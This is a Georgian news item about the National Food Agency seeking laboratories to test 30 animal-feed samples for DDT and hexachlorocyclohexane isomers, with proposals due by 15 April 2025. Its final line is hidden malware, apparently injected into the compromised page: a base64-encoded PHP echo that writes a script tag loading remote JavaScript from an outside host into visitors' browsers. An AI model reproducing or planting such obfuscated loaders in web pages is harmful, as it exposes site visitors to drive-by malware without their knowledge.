gorgia
ავერსი jaluzi

სურსათის ეროვნული სააგენტო ცხოველის საკვებში პესტიციდების ნარჩენების მაქსიმალური დონის გამოვლენის მიზნით ლაბორატორიული გამოკვლევისთვის ბაზრის კვლევას აცხადებს.

ტექნიკური დავალების მიხედვით, მიმწოდებელმა ცხოველის საკვების 30 ნიმუშში 3 მაჩვენებელზე კვლევა უნდა უზრუნველყოს.

უფრო კონკრეტულად, ლაბორატორიამ კვლევა შემდეგ სამ მაჩვენებელზე უნდა ჩაატაროს:

DDT (დიქლორ-დიფენილტრიქლოროეთანი);
ლინდანი (ჰექსაქლორციკლოჰექსანი, δ იზომერი);
ჰექსაქლორციკლოჰექსანი (β იზომერი).
„ლაბორატორიული კვლევისათვის წარდგენილი ნიმუშების გამოცდა უნდა ჩატარდეს აღნიშნული შესყიდვით განსაზღვრული გამოსაკვლევი მაჩვენებლების ტესტირების სფეროში აკრედიტებულ ლაბორატორიაში, აკრედიტებული მეთოდებით“, - აღნიშნულია ტექნიკურ დავალებაში.

მიმწოდებელმა წინადადება 2025 წლის 15 აპრილის ჩათვლით უნდა უზრუნველყოს.

173
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");